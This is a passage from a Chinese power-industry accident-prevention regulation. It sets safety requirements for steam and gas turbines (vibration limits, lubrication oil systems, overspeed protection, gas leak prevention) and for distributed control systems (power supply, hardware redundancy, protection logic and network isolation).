通过临界转速或降速暖机。 (3)机组运行中要求轴承振动不超过0.03mm或相对轴振动不超过0.09mm, 超过时应设法消除,当相对轴振动大于0.25mm应立即打闸停机;当轴承振动或 相对轴振动变化量超过报警值的25%,应查明原因设法消除,当轴承振动或相对 轴振动突然增加报警值的100%,应立即打闸停机;或严格按照制造商的标准执 行。 (4)高压外缸上、下缸温差超过50℃,高压内缸上、下缸温差超过35℃。 若制造厂有更严格的规定,应从严执行。 (5)机组正常运行时,主、再热蒸汽温度在10min内下降50℃。调峰型单层 汽缸机组可根据制造商相关规定执行。 8.3.10 应采用良好的保温材料和施工工艺,保证机组正常停机后的上下缸温 差不超过35℃,最大不超过50℃。若制造厂有更严格的规定,应从严执行。 8.3.11 汽轮机在热状态下,锅炉不得进行打水压试验。 8.3.12 机组监测仪表必须完好、准确,并定期进行校验。尤其是大轴晃度、 振动和汽缸金属温度表计,应按热工监督条例进行统计考核。 8.3.13 严格执行运行、检修操作规程,严防汽轮机进水、进冷汽。 8.3.14 应具备和熟悉掌握的资料: (1)转子安装原始弯曲的最大晃动值(双振幅),最大弯曲点的轴向位置 及在圆周方向的位置。 81 (2)大轴晃度表测点安装位置转子的原始晃动值(双振幅),最高点在圆 周方向的位置。 (3)机组正常启动过程中的波德图(Bode)和实测轴系临界转速。 (4)正常情况下盘车电流和电流摆动值(针对液压盘车装置为油压),以 及相应的油温和顶轴油压。 (5)正常停机过程的惰走曲线,以及相应的真空值和顶轴油泵的开启转速 和紧急破坏真空停机过程的惰走曲线。 (6)停机后,机组正常状态下的汽缸主要金属温度的下降曲线。 (7)通流部分的轴向间隙和径向间隙。 (8)机组在各种状态下的典型启动曲线和停机曲线,并应全部纳入运行规 程。 (9)记录机组启停全过程中的主要参数和状态。停机后定时记录汽缸金属 温度、大轴弯曲、盘车电流、汽缸膨胀、胀差等重要参数,直到机组下次热态启 动或汽缸金属温度低于150℃为止。 (10)系统进行改造,运行规程中尚未作具体规定的重要运行操作或试验, 必须预先制订安全技术措施,经总工程师或厂级分管生产领导批准后再执行。 8.4 防止汽轮机、燃气轮机轴瓦损坏事故 8.4.1 润滑油冷油器制造时,冷油器切换阀应有可靠的防止阀芯脱落的措施, 避免阀芯脱落堵塞润滑油通道导致断油、烧瓦。 8.4.2 油系统严禁使用铸铁阀门,各阀门门杆应与地面水平安装。主要阀门 应挂有“禁止操作”警示牌。主油箱事故放油阀应串联设置两个钢制截止阀,操作 手轮应设在距油箱5m以外,有两个以上通道且能保证漏油着火时人员可到达并 便于操作、便于撤离的地方,手轮应挂有明显的“禁止操作”标志牌,手轮不应加 锁。润滑油供油管道中不宜装设滤网,若装设滤网,必须采用激光打孔滤网,并 有防止滤网堵塞和破损的措施。 8.4.3 润滑油系统油泵出口逆止阀前应设置可靠的排气措施,防止油泵启动 后泵出口堆积空气不能快速建立油压,导致轴瓦损坏。 8.4.4 直流润滑油泵的直流电源系统应有足够的容量,其各级保险应合理配 置,防止故障时熔断器熔断使直流润滑油泵失去电源。 82 8.4.5 交流润滑油泵电源的接触器,应采取低电压延时释放措施,同时要保 证自投装置动作可靠。 8.4.6 应设置主油箱油位低跳机保护,必须采用测量可靠、稳定性好的液位 测量方法,并采取“三取二”的保护方式,保护动作值应考虑机组跳闸后的惰走时 间。机组运行中发生油系统渗漏时,应申请停机处理,避免处理不当造成大量漏 油,导致烧瓦。如已发生大量漏油,应立即打闸停机。 8.4.7 润滑油系统不宜在轴瓦进油管道装设调压阀。已装设的机组,调压阀 应有可靠的防松脱措施,并定期进行检查。避免运行中阀芯移位或脱落造成断油 烧瓦。 8.4.8 电厂应与制造厂核实新建或改造机组的汽轮机轴向推力计算值或实测 值,防止调速汽阀动作异常或补汽阀开启时轴向推力过大,造成推力轴承损伤。 8.4.9 安装和检修时要彻底清理油系统杂物,严防遗留杂物堵塞油泵入口或 管道。 8.4.10 润滑油系统油质应按规程要求定期进行化验,油质劣化应及时处理。 在油质不合格的情况下,严禁机组启动。 8.4.11 润滑油压低报警、联启油泵、跳闸保护、停止盘车定值及测点安装位 置应按照制造商要求安装和整定,低油压联锁启动直流油泵整定值与汽轮机油压 低跳闸整定值应相同,直流油泵联启的同时必须跳闸停机。对各压力开关应采用 现场试验系统进行校验,润滑油压低时应能正确、可靠的联动交流、直流润滑油 泵。 8.4.12 新机组或润滑油系统检修、改造后,应进行交流润滑油泵跳闸联锁启 动备用交流润滑油泵和直流润滑油泵试验,在联锁启动过程中,系统润滑油压不 得低于汽轮机运行最低安全油压(或润滑油压低跳汽轮机值)。 8.4.13 辅助油泵(包括交流润滑油泵、直流润滑油泵)及其自启动装置,应 按要求定期进行启动试验,保证油泵处于良好的备用状态。机组启动前辅助油泵 必须处于联动状态。机组正常停机前,应先启动交流润滑油泵,确认油泵工作正 常后再打闸停机。 8.4.14 润滑油系统冷油器、辅助油泵、滤网等进行切换时,应在指定人员的 监护下按操作票顺序缓慢进行操作,操作中严密监视润滑油压的变化,严防切换 83 操作过程中断油。 8.4.15 油位计、油压表、油温表及相关的信号装置,必须按要求装设齐全、 指示正确,表计值DCS显示应与就地显示一致,并定期进行校验。 8.4.16 机组启动、停机和运行中要严密监视推力瓦、轴瓦钨金温度和回油温 度。当温度超过标准要求时,应按规程规定果断处理。 8.4.17 在机组启、停过程中,应按制造商规定的转速停止、启动顶轴油泵。 8.4.18 在运行中发生了可能引起轴瓦损坏的异常情况(如水冲击、瞬时断油、 轴瓦温度急升超过120℃等),应在确认轴瓦未损坏之后,方可重新启动。 8.4.19 检修中应检查主油泵、交流润滑油泵和直流润滑油泵出口逆止阀的状 态是否正常,防止启停机过程中断油。 8.4.20 机组蓄电池在按22.2.6.17条或运行规程规定进行核对性放电试验后, 应带上直流润滑油泵、直流密封油泵进行实际带负载试验。 8.4.21 严格执行运行、检修操作规程,严防轴瓦断油。 8.5 防止燃气轮机超速事故 8.5.1 在设计燃气参数范围内,调节系统应能维持燃气轮机在额定转速下稳 定运行,甩负荷后能将燃气轮机组转速飞升控制在超速保护动作值以下并迅速稳 定到额定转速。 8.5.2 燃气关断阀和燃气控制阀(包括燃气压力和燃气流量调节阀)应能关 闭严密。新投产机组及大修后机组应进行调节系统静态试验及关闭时间测试,阀 门开关动作过程迅速且无卡涩现象。自检试验不合格,燃气轮机组严禁启动。 8.5.3 燃气轮机组轴系应至少安装两套转速监测装置在不同的转子上。两套 装置转速值相差超过30r/min后DCS应发报警。技术人员应分析原因,确认转速 测量系统故障时,应立即处理。 8.5.4 燃气轮机组重要运行监视表计,尤其是转速表,显示不正确或失效, 严禁机组启动。运行中的机组,在无任何有效监视手段的情况下,必须停止运行。 8.5.5 透平油和液压油品质应按规程要求定期化验。燃气轮机组投产初期, 燃气轮机本体和油系统检修后,以及燃气轮机组油质劣化时,应缩短化验周期。 8.5.6 透平油和液压油的油质应合格,在油质不合格的情况下,严禁燃气轮 机组启动。 84 8.5.7 燃气轮机组电超速保护动作转速一般为额定转速的108%~110%。运行 期间电超速保护必须正常投入。超速保护不能可靠动作时,禁止燃气轮机组运行 (超速试验所必要的启动、并网运行除外)。燃气轮机组电超速保护应进行实际 升速动作试验,保证其动作转速符合有关技术要求。 8.5.8 对新投产的燃气轮机组或调节系统进行重大改造后的燃气轮机组应进 行甩负荷试验。 8.5.9 机组正常停机时,严禁违反制造商规定带负荷解列。联合循环单轴机 组应先停运汽轮机,检查发电机有功、无功功率到制造商规定值,再与系统解列; 分轴机组应先检查发电机有功、无功功率到制造商规定值,再与系统解列。 8.5.10 电液伺服阀(包括各类型电液转换器)的性能必须符合要求,否则不 得投入运行。油系统冲洗时,电液伺服阀必须按规定使用专用盖板替代,不合格 的油严禁进入电液伺服阀。运行中要严密监视其运行状态,不卡涩、不泄漏和系 统稳定。大修中要进行清洗、检测等维护工作。备用伺服阀应按照制造商的要求 条件妥善保管。 8.5.11 燃气轮机组大修后,必须按规程要求进行燃气轮机调节系统的静止试 验或仿真试验,确认调节系统工作正常。否则严禁机组启动。 8.6 防止燃气轮机轴系断裂及损坏事故 8.6.1 燃气轮机组主、辅设备的保护装置必须正常投入,振动监测保护应投 入运行;燃气轮机组正常运行时瓦振、轴振应达到相关标准的优良范围,并注意 监视变化趋势。 8.6.2 发生下列情况之一,严禁机组启动: (1)在盘车状态听到有明显的刮缸声。 (2)压气机进口滤网破损或压气机进气道可能存在残留物。 (3)机组转动部分有明显的摩擦声。 (4)任一火焰探测器或点火装置故障。 (5)燃气辅助关断阀、燃气关断阀、燃气控制阀任一阀门或其执行机构故 障。 (6)燃气辅助关断阀、燃气关断阀、燃气控制阀任一阀门严密性试验不合 格。 85 (7)具有压气机进口导流叶片和压气机防喘阀活动试验功能的机组,压气 机进口导流叶片和压气机防喘阀活动试验不合格。 (8)任一燃气轮机排气温度测点故障。 (9)燃气轮机主保护故障。 8.6.3 燃气轮机组应避免在燃烧模式切换负荷区域长时间运行。 8.6.4 严格按照超速试验规程进行超速试验。 8.6.5 加强燃气轮机排气温度、排气分散度、轮间温度、火焰强度等运行数 据的综合分析,及时找出设备异常的原因,防止局部过热燃烧引起的设备裂纹、 涂层脱落、燃烧区位移等损坏。 8.6.6 为防止发电机非同期并网造成的燃气轮机轴系断裂及损坏事故,应严 格落实第10.10.1条规定的各项措施。 8.6.7 发生下列情况之一,应立即打闸停机: (1)运行参数超过保护值而保护拒动。 (2)机组内部有金属摩擦声或轴承端部有摩擦产生火花。 (3)压气机失速,发生喘振。 (4)机组冒出大量黑烟。 ( 5) 机 组运 行 中 , 要求轴 承 振 动不 超 过 0.03mm或相 对 轴 振动不 超 过 0.09mm,超过时应设法消除,当相对轴振动大于0.25mm应立即打闸停机;当轴 承振动或相对轴振动变化量超过报警值的25%,应查明原因设法消除,当轴承振 动或相对轴振动突然增加报警值的100%,应立即打闸停机;或严格按照制造商 的标准执行。 (6)运行中发现燃气泄漏探测器动作或检测到燃气浓度有突升,达到停机 条件,立即打闸停机;尚未达到停机条件,应立即申请检查处理。 8.6.8 机组发生紧急停机时,应严格按照制造商要求连续盘车若干小时以上, 才允许重新启动点火,以防止冷热不均发生转子振动大或残余燃气引起爆燃而损 坏部件。 8.6.9 燃气轮机停止运行投盘车时,严禁随意开启罩壳各处大门和随意增开 燃气轮机间冷却风机,以防止因温差大引起缸体收缩而使压气机刮缸。在发生严 重刮缸时,应立即停运盘车,采取闷缸措施48h后,尝试手动盘车,直至投入连 86 续盘车。 8.6.10 调峰机组应按照制造商要求控制两次启动间隔时间,防止出现通流部 分刮缸等异常情况。 8.6.11 应定期检查燃气轮机、压气机气缸周围的冷却水、水洗等管道、接头、 泵体,防止运行中断裂造成冷水喷在高温气缸上,发生气缸变形、动静摩擦设备 损坏事故。 8.6.12 定期对压气机进行孔窥检查,防止空气悬浮物或滤后不洁物对叶片的 冲刷摩损,或压气机静叶调整垫片受疲劳而脱落。定期对压气机进行离线水洗或 在线水洗。定期对压气机前级叶片进行无损探伤等检查。周期应按制造商要求或 严于厂商要求的相关规范执行。 8.6.13 严格按照燃气轮机制造商的要求,定期对燃气轮机孔窥检查,定期对 (DL/T 438) 转子进行表面检查或无损探伤。按《火力发电厂企属技术监督规程》 相关规定,对高温段应力集中部位应进行表面检验,有疑问时进行表面探伤。若 需要,可选取不影响转子安全的部位进行硬度检验,若硬度相对前次检验有较明 显变化时应进行金相组织检验。 8.6.14 离线水洗完成后应按设备厂家要求进行甩干、烘干或机组启动,不得 在离线水洗后直接停机闲置。 8.6.15 定期检查燃气轮机进气系统,防止空气未经过滤或过滤不充分而进入 压气机。 8.6.16 新机组投产前和机组大修中,应重点检查: (1)轮盘拉杆螺栓紧固情况、轮盘之间错位、通流间隙、转子及各级叶片 的冷却风道。 (2)平衡块固定螺栓、风扇叶固定螺栓、定子铁芯支架螺栓,并应有完善 的防松措施。绘制平衡块分布图。 (3)各联轴器轴孔、轴销及间隙配合满足标准要求,联轴器螺栓外观及金 属探伤检验,紧固防松措施完好。 (4)燃气轮机热通道内部紧固件与锁定片的装复工艺良好,防止因气流冲 刷引起部件脱落进入喷嘴而损坏通道内的动静部件。 8.6.17 燃气轮机热通道主要部件更换返修时,应对主要部件焊缝、受力部位 87 进行无损探伤,检查返修质量,防止运行中发生裂纹断裂等异常事故。 8.6.18 严禁使用不合格的转子,已经过制造商确认可以在一定时期内投入运 行的有缺陷转子应对其进行技术评定,根据燃气轮机组的具体情况、缺陷性质制 订运行安全措施,并报上级主管部门备案。 8.6.19 建立燃气轮机组试验档案,包括投产前的安装调试试验、计划检修的 调整试验、常规试验和定期试验。 8.6.20 建立燃气轮机组事故档案,记录事故名称、性质、原因和防范措施。 8.6.21 建立转子技术档案,包括制造商提供的转子原始缺陷和材料特性等原 始资料,历次转子检修检查资料;燃气轮机组主要运行数据、运行累计时间、主 要运行方式、冷热态启停次数、启停过程中的负荷的变化率、主要事故情况的原 因和处理;转子金属监督技术资料。根据转子档案记录,定期对转子进行分析评 估,把握转子寿命状态;建立燃气轮机热通道部件返修使用记录台账。 8.7 防止燃气轮机燃气系统泄漏爆炸事故 8.7.1 天然气管道放散塔或放空管的设计和安装,应满足现行《石油天然气 工程设计防火规范》(GB 50183)中对高度和周围环境相关规定。 8.7.2 严禁燃气管道从管沟内敷设。对于从房内穿越的架空管道,必须做好 穿墙套管的严密封堵,合理设置现场燃气泄漏检测器,防止燃气泄漏引起意外事 故。 8.7.3 对于与燃气系统相邻的,自身不含燃气运行设备,但可通过地下排污 管道等通道相连通的封闭区域,也应装设燃气泄漏探测器。 8.7.4 按燃气管理制度要求,做好燃气系统日常巡检、维护与检修工作。新 安装或检修后的管道或设备应进行系统打压试验,确保燃气系统的严密性。 8.7.5 新安装的燃气管道应在24h之内检查一次,并应在通气后的第一周进行 一次复查,确保管道系统燃气输送稳定安全可靠。 8.7.6 燃气泄漏量达到测量爆炸下限的20%时,不允许启动燃气轮机。 8.7.7 点火失败后,重新点火前必须进行足够时间的清吹,防止燃气轮机和 余热锅炉通道内的燃气浓度达到爆炸极限而产生爆燃事故。 8.7.8 加强对燃气泄漏探测器的定期维护,每季度进行一次校验,确保测量 可靠,防止发生因测量偏差、拒报而发生火灾爆炸。 88 8.7.9 严禁在运行中的燃气轮机周围进行燃气管道燃气排放与置换作业。 8.7.10 严禁在燃气泄漏现场违规操作。消缺时必须使用铜制专用工具,防止 处理事故中产生静电火花引起爆炸。 8.7.11 运行点检人员巡检燃气系统时,必须使用防爆型的照明工具、对讲机、 气体检漏仪等必要电子设备,操作阀门尽量用手操作,必要时应用铜制工具进行。 严禁使用非防爆型工器具作业。 8.7.12 进入燃气系统区域(如调压站、燃气轮机间、前置模块等)的人员必 须穿防静电工作服。不得穿易产生静电的服装、带铁掌的鞋,不得携带移动电话 及其他易燃、易爆品进入燃气系统区域。燃气区域禁止用非防爆设备照相、摄影。 8.7.13 进入燃气系统区域前应先通过消静电装置消除静电。 8.7.14 在燃气系统附近进行明火作业时,应有严格的管理制度。明火作业的 地点测量空气所含燃气浓度不得超过爆炸下限的20%,其中甲烷浓度不得超过 1%,并经批准后才能进行明火作业,同时按规定间隔时间做好动火区域危险气 体含量检测。 8.7.15 燃气调压站、前置模块等燃气系统应按规定配备足够的消防器材,并 按时检查和试验。 8.7.16 严格执行燃气轮机点火系统的管理制度,定期加强维护管理,防止点 火器、高压点火电缆等设备因高温老化损坏而引起点火失败。 8.7.17 严禁未装设阻火器的汽车、摩托车、电瓶车等车辆在燃气轮机的警示 范围或调压站内行驶。 8.7.18 应结合机组检修,对燃气轮机仓及燃料阀组间燃气系统进行气密性试 验,对燃气管道进行全面检查。 8.7.19 机组停运时,禁止采用向燃料关断阀后通入燃气的方式对燃气透平及 其他管道设备进行法兰找漏等试验、检修工作。 8.7.20 在燃气管道系统部分投入燃气运行的情况下,与充入燃气相邻的、以 阀门相隔断的管道部分必须充入氮气,且要进行常规的巡检查漏工作。 8.7.21 做好在役地下燃气管道防腐涂层的检查与维护工作。正常情况下高 压、次高压管道(0.4MPa<P≤4.0MPa)应每3年一次。10年以上的管道每2年一 次。 89 8.7.22 燃气调压站内的防雷设施应处于正常运行状态。每年应进行两次检 测,其中在雷雨季节前应检测一次,确保接地电阻值在设计范围内。 8.7.23 露天布置的调压站、前置模块等燃气系统,应建立并严格执行管道、 阀门等设备的定期保养制度,避免设备产生严重锈蚀。 9 防止分散控制系统失灵事故的重点要求 9.1 防止分散控制系统供电系统事故 9.1.1 分散控制系统电源应设计有可靠的后备手段,电源的切换时间应保证 控制器、服务器不被初始化;操作员站如无双路电源切换装置,则必须将两路供 电电源分别连接于不同的操作员站;系统电源故障应设置最高级别的报警;严禁 非分散控制系统用电设备接到分散控制系统的电源装置上;公用分散控制系统电 源,应分别取自不同机组的不间断电源系统,且具备无扰切换功能。分散控制系 统电源的各级电源开关容量和熔断器熔丝应匹配,防止故障越级。 9.1.2 交、直流电源开关和接线端子应分开布置,交、直流电源开关和接线 端子应有明显的标示。 9.1.3 分散控制系统(DCS)使用的不间断电源(UPS)电源装置应做定期 维护,蓄电池应定期进行充放电试验,应对 UPS 装置及电源冗余切换装置出口 电源进行录波试验,确保供电质量。如有条件,宜对所有 UPS 电源进行远程实 时监控,并作相应 UPS 故障报警。 9.1.4 热控设备需要两路直流电源互备时,严禁采用大功率二极管将厂用直 流两段电源进行耦合。 9.1.5 DCS 各等级电压电源应按照“专电专用”原则,严禁接入其他非核心负 载,例如机柜风扇、指示灯、操作面板、检修用电源、伴热电源、照明电源等。 9.1.6 DCS 应具有可靠的电源失电报警功能。当外部供电或内部供电任一路 电源故障时,均能在人机界面显示故障信息,触发报警。 9.1.7 DCS 网络通信设备电源应双路配置,电源的切换时间应保证网络通信 设备不被初始化,且应有失电报警功能。 9.1.8 分散控制系统设计阶段时,用于重要联锁保护的输入输出信号,应避 免多个信号通过短接线或母线共用直流正极或负极,或应根据控制设备的重要等 90 级进行分组,各组电源分别配以熔丝或空气开关做电气隔离,尽可能降低集中供 电风险。 9.1.9 热控设备进行改造后,应针对电源回路复核空气开关或熔丝的额定参 数,确保设备的用电容量不超过空气开关或熔丝的额定容量,同时核算上下级电 源匹配功耗,防止因空气开关或熔丝越级跳闸或熔断导致失电事故范围扩大。 9.1.10 独立于 DCS 外的重要控制系统(如主燃料跳闸(MFT)控制柜、紧 急跳闸系统(ETS)电源柜、汽轮机监控仪表系统(TSI)等)电源应冗余配置, 并设置电源故障声光报警。 9.1.11 DCS 冗余电源应每年至少进行一次切换试验,如机组连续运行超过一 年,则下次启动前应开展电源切换试验。 9.2 防止分散控制系统硬件事故 9.2.1 分散控制系统配置应能满足机组任何工况下的监控要求(包括紧急故 障处理),控制站及人机接口站的中央处理器(CPU)负荷率、系统网络负荷率、 分散控制系统与其他相关系统的通信负荷率、控制处理器扫描周期、系统响应时 间、事故顺序记录(SOE)分辨率、抗干扰性能、控制电源质量、定位系统时钟 等指标应满足相关标准的要求,控制系统升级或改造后应开展全功能性能测试, 机组大修后应开展必要功能性能测试。 9.2.2 分散控制系统的控制器、系统电源、为信号输入/输出(I/O)模件供 电的直流电源、通讯网络(含现场总线形式)等均应采用完全独立的冗余配置, 且具备无扰切换功能。冗余的通讯网络应具有互通功能。 9.2.3 分散控制系统控制器应严格遵循机组重要功能分开的独立性配置原 则,各控制功能应遵循任一组控制器或其他部件故障对机组影响最小的原则。 9.2.4 重要参数测点、参与机组或设备保护的测点应冗余配置,冗余 I/O 测 点应分配在不同模件上,任一测点采集故障不应影响其它冗余测点采集。 9.2.5 分散控制系统接地必须严格遵守相关技术要求,接地电阻满足标准要 求,并保证分散控制系统一点接地;所有进入分散控制系统的控制信号电缆必须 采用质量合格的屏蔽电缆,且可靠单端接地;分散控制系统与电气系统共用一个 接地网时,分散控制系统接地线与电气接地网只允许有一个连接点。不同类型的 控制系统应严格按照接地要求接地,不应混用接地汇流排。 91 9.2.6 机组应配备必要的、可靠的、独立于分散控制系统的硬手操设备(如 紧急停机、紧急停炉按钮等,按钮应有防护措施),以确保安全停机停炉。 9.2.7 分散控制系统电子间环境满足相关标准要求,不应有 380V 及以上动 力电缆及产生较大电磁干扰的设备。分散控制系统电子间存在产生电磁干扰设备 且不具备改造条件的应进行安全评估,确保 DCS 运行稳定。机组运行时,禁止 在电子间使用无线通信工具。 9.2.8 远程控制柜与主系统的两路通信电(光)缆要分层敷设。 9.2.9 对于多台机组分散控制系统网络互联的情况,以及当公用分散控制系 统的网络独立配置并与两台单元机组的分散控制系统进行通信时,应采取可靠隔 离及闭锁措施、只能有一台机组有权限对公用分散控制系统进行操作。 9.2.10 汽轮机紧急跳闸系统和汽轮机监视仪表应加强定期巡视检查,所配电 源应取自可靠的两路独立电源,电压波动值不得大于±5%,且不应含有高次谐波。 汽轮机监视仪表的中央处理器及重要跳机保护信号和通道必须冗余配置,输出继 电器必须可靠。 9.3 防止就地热工设备异常引发事故 9.3.1 按照单元机组配置的重要设备(如循环水泵、空冷系统的辅机)应纳 入各自单元控制网,避免由于公用系统中设备事故扩大为两台或全厂机组的重大 事故。 9.3.2 在高温环境下使用的重要控制、保护信号电缆应使用耐高温阻燃电缆, 敷设时应避免直接接触高温热源,敷设在油系统附近处电缆应采用阻油性电缆, 电缆敷设处易受机械性外力损伤时,还应选择带铠装层电缆。就地电缆接线端子 或预制插头环境防护等级应保证与电缆防护等级匹配,确保电缆联接的可靠性。 9.3.3 就地执行器的安装应考虑环境因素(例如:高温、高湿、结露、腐蚀 性气体、盐雾、振动及雷击等)对设备运行的影响。如果现场环境极为恶劣,可 采取移位、分体式改造、热绝缘处理、防水密封等措施改善就地执行器运行环境, 提高执行器运行的可靠性。 9.3.4 气源装置宜选用无油空气压缩机,仪表与控制气源应有除油、除水、 除尘、干燥等空气净化处理措施。气源总容量应能满足仪表与控制气动仪表和设 备的最大耗气量。当气源装置停用时,仪表与控制用压缩空气系统的贮气罐的容 92 量,应能维持不小于 5 分钟的耗气量。供气母管上应配置空气露点检测装置。 9.3.5 独立配置的锅炉灭火保护装置应符合《电站锅炉炉膛防爆规程》 (DL/T 435)、《火力发电厂锅炉炉膛安全监控系统技术规程》(DL/T 1091) 中的技术规范要求,并配置可靠的电源。系统涉及的炉膛压力取样装置、压力开 关、传感器、火焰检测器及冷却风系统等设备应符合《电站锅炉炉膛防爆规程》 (DL/T 435)的规定。 9.3.6 重要控制回路的执行机构应具有三断保护(断气、断电、断信号)功能, 特别重要的执行机构,还应设有可靠的机械闭锁措施。 9.3.7 重要控制、保护信号的取样装置应根据所处位置和环境有防堵、防震、 防漏、防冻、防雨、防抖动的等措施。触发机组跳闸的保护信号的开关量仪表和 变送器应单独设置。 9.3.8 应定期检查汽轮机高(中)压调节阀、汽动给水泵调节阀油动机位置 反馈变送器(LVDT),及时发现变送器连杆松动、变形、磨损、不对中等问题。 每个调节阀油动机宜安装不少于两只 LVDT 变送器,冗余配置的 LVDT 开度必 须在操作员站同时显示。 9.3.9 严禁涉及重要保护的变送器、开关与其他测量元件共用取样口及取样 管路。 9.3.10 循环流化床机组锅炉重要保护回路涉及的温度测点,其布置位置在高 温、高浓度物料区时,该类温度测量元件保护套管材质应使用耐高温耐磨材料或 对保护套管做耐磨喷涂处理,防止由于长期磨损造成温度测点失效,导致机组热 工保护失灵事故发生。 9.3.11 所有就地涉及热控重要保护的启停或开关操作按钮、就地远方切换按 钮、就地操作显示面板均应有防护措施,防止因无意磕碰、踩踏造成重要设备停 机从而导致机组跳闸。 9.3.12 所有热工保护冗余配置的测量信号应分别使用不同电缆进行信号传 输。 9.3.13 所有热工电源及信号电缆必须具有相应的绝缘强度、阻燃强度和机械 强度,严禁使用绝缘老化或失去绝缘性能的电气线路,严禁在热工电源及信号电 缆上悬挂无关异物,严禁热工电源及信号电缆超负荷运行或带故障使用。 93 9.3.14 主控室、电子间机柜、工程师站等通往电缆夹层、隧道、穿越楼板、 墙壁、柜、盘等处的所有电缆孔洞和盘面之间的缝隙(含电缆穿墙套管与电缆之 间缝隙)必须采用合格的不燃或阻燃材料封堵。电缆竖井和电缆沟必须分段做防 火隔离,对敷设在主控室或厂房内构架上的电缆要采取分段阻燃措施。 9.4 防止因检修、维护不当引发事故 9.4.1 各项热工保护功能在机组运行中严禁退出。若发生热工保护装置(系 统、包括一次检测设备)故障被迫退出运行时,应制定可靠的安全措施,并开具 工作票,经批准后方可处理。锅炉炉膛压力、全炉膛灭火、汽包水位(直流炉断 水)和汽轮机超速、轴向位移、机组振动、低油压等重要保护装置当其故障被迫 退出运行时,应在 8 小时内恢复;其它保护装置被迫退出运行时,应在 24 小时 内恢复。 9.4.2 检修机组启动前或机组停运 15 天以上,应对机、炉主保护及其他重要 热工保护装置进行静态模拟试验,检查跳闸逻辑、报警及保护定值。热工保护联 锁试验中,应采用现场信号源处模拟试验或物理方法进行实际传动,但禁止在控 制柜内通过开路或短路输入端子的方法进行试验。 9.4.3 所有热工保护或联锁有关的测量元件、取样管路、变送器、信号电缆 均应使用文字标识或醒目颜色明示与其他测点的区别,严防对其异常操作。 9.4.4 多台机组共用一个工程师站时,应在不同机组工程师站操作区域之间 做物理隔离,明确标识设备归属的机组编号,严格进入及退出操作区域的管理, 防止热工人员因走错间隔造成设备误操作。 9.4.5 加强对分散控制系统的监视检查,当发现中央处理器、网络、电源等 故障时,应及时通知运行人员并启动相应应急预案。 9.4.6 规范分散控制系统软件和应用软件的管理,软件的修改、更新、升级 必须履行审批授权及责任人制度。在修改、更新、升级软件前,应对软件进行备 份。拟安装到分散控制系统中使用的软件必须严格履行测试和审批程序,必须建 立有针对性的分散控制系统防病毒措施。 9.4.7 加强分散控制系统网络通信管理,运行期间严禁在控制器、人机接口 网络上进行不符合相关规定许可的较大数据包的存取,防止通信阻塞。 9.5 防止保护系统失灵事故 94 9.5.1 除特殊要求的设备外(如紧急停机电磁阀等),其他所有设备都应采 用脉冲信号控制,防止分散控制系统失电导致停机停炉时,引起该类设备误停运, 造成重要主设备或辅机的损坏。 9.5.2 所有重要的主、辅机保护都应采用“三取二”、“四取二”等可靠的逻辑 判断方式,保护信号应遵循从取样点到输入模件全程相对独立的原则,确因系统 原因测点数量不够,应有防保护误动及拒动措施,保护信号供电亦应采用分路独 立供电回路。 9.5.3 热工保护系统输出的指令应优先于其它任何类型指令。控制系统的控 制器发出的机、炉跳闸信号及相应的动作回路应冗余配置,且应设计机组硬接线 跳闸回路。机、炉主保护回路中不应设置供运行人员切(投)保护的任何操作手段。 9.5.4 汽轮机紧急跳闸系统应设计为失电动作,硬手操设备本身要有防止误 操作、动作不可靠的措施。手动停炉、停机保护应具有独立于分散控制系统(或 可编程逻辑控制器(PLC))装置的硬跳闸控制回路,配置有双通道四跳闸线圈 汽轮机紧急跳闸系统的机组,应定期进行汽轮机紧急跳闸系统在线试验。 9.5.5 主机及主要辅机保护逻辑设计合理,符合工艺及控制要求,逻辑执行 时序、相关保护的配合时间配置合理,防止由于取样延迟等时间参数设置不当而 导致的保护失灵。 9.5.6 重要辅机的“已启动”和“已停机”信号应真实反映辅机的启停状态,防 止由于虚假信号造成机组跳闸。 9.5.7 对于重要被调量或主要保护、联锁有关的模拟量,如果需做温度、压 力修正,引入修正计算的测点应做冗余配置,防止修正测点单点故障导致测量异 常事故。如果冗余配置的修正测点发生故障,应做相应报警,模拟量调节系统应 切手动。 9.5.8 送风机、引风机、一次风机、空气预热器、给水泵、凝结水泵、真空 泵、重要冷却水泵等、以及非母管制的循环水泵等多台组合或主/备运行重要辅 机(辅助)设备的保护及控制功能,应分别配置在不同的控制器中。 9.5.9 重要辅机采用单台配置方式的机组(如单台给水泵、单台送风机、单 台引风机、单台一次风机等),其入口门(挡板)、出口门(挡板)设备的全开、 全关信号判断逻辑应增加工质特性信号判断(如流量、压力等信号),并对全开、 95 全关状态进行光字报警,避免出现阀门全开、全关信号同时触发或阀门全开信号 瞬间消失、全关信号同时出现等故障导致跳机。 9.5.10 机组和主要辅机跳闸的输入信号,通过硬接线直接接入对应保护单元 的输入通道。不同系统间的重要联锁与控制信号,除通信连接外还应硬接线连接 并冗余配置硬接线信号。 9.5.11 涉及机组安全的重要设备(如汽轮机交流润滑油泵、汽动给水泵润滑 油泵)应有独立于分散控制系统的硬接线操作回路。润滑油压力低信号应直接送 入电气启动回路,确保在没有分散控制系统控制的情况下能够自动启动,保证汽 机的安全。 9.5.12 涉及机组保护的压力开关安装位置与取样点位置存在明显影响测量 准确性的标高差时,应按照机组保护定值对压力开关动作值进行相应修正。 9.5.13 冗余控制器(包括电源)故障和故障后复位时,应采取必要措施,确认 保护和控制信号的输出处于安全位置。 9.6 防止模拟量调节事故 9.6.1 模拟量调节系统功能设计合理,满足相关标准要求。重要模拟量控制 系统(如协调系统、汽水系统、风烟系统、燃烧系统等)应定期开展试验。 9.6.2 模拟量调节系统测量信号、执行机构应可靠,综合信号故障、指令与 反馈偏差大、设定值与被调量偏差大、被调量坏质量等调节失效时应报警,并切 手动。 9.6.3 模拟量调节系统应具备全工况全过程的无扰切换功能,调节品质应满 足相关标准要求。 9.7 防止RB系统事故 9.7.1 机组应设计有满足相关标准要求的辅机故障减负荷(RB)功能,且大 修后或重要辅机改造后应开展相应的 RB 试验。 9.7.2 应按照 GB/T 31461、DL/T 1213 的要求,进行 RB 静态和动态试验, 试验结果应满足相关标准要求。 9.7.3 RB 控制系统滑压速率、降负荷速率、给水泵转速速率、磨煤机跳闸间 隔时间等参数应设置合理,且通过动态试验验证。 9.8 防止分散控制系统网络事故 96 9.8.1 分散控制系统与管理信息大区之间必须设置经国家指定部门检测认证 的电力专用横向单向安全隔离装置。分散控制系统与其他生产大区之间应当采用 具有访问控制功能的设备、防火墙或者相当功能的设施,实现逻辑隔离。分散控 制系统与广域网的纵向交接处应当设置经过国家指定部门检测认证的电力专用 